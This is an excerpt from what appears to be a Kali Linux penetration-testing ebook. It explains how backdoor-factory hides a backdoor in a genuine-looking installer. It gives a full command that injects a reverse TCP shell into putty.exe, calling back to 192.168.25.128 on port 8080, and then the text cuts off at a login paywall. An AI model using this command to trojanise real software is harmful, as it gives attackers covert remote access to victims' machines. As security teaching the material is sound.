Creating backdoors using Backdoor Factory

A quick look at the dictionary meaning of the word backdoor gives us achieved by using indirect or dishonest means. In the computing world, backdoors are something which are hidden and are used to get covert entry into the system. For example, if we get a plain executable file from some unknown person, we may get suspicious. However, if we get a genuine-looking installer then we might execute it. However, that installer might have a hidden backdoor which may open up our system to the attacker.

Creating a backdoor typically involves patching a genuine looking executable with our shellcode. Kali Linux has a special tool backdoor-factory which helps us create backdoors. The backdoor-factory can be launched from the Terminal as shown in the following image:

We now execute the command as shown in the following image:

root@kali:~# backdoor-factory -f /root/Desktop/putty.exe -s reverse_shell_tcp_inline -H  192.168.25.128 -P 8080

This command would open the file putty.exe located at /root/Desktop, inject reverse TCP shell into the executable, and configure the backdoor to connect to IP address 192.168.25.128 on port 8080.

..................Content has been hidden....................

You can't read the all page of ebook, please click here login for view all page.
Reset
3.12.108.236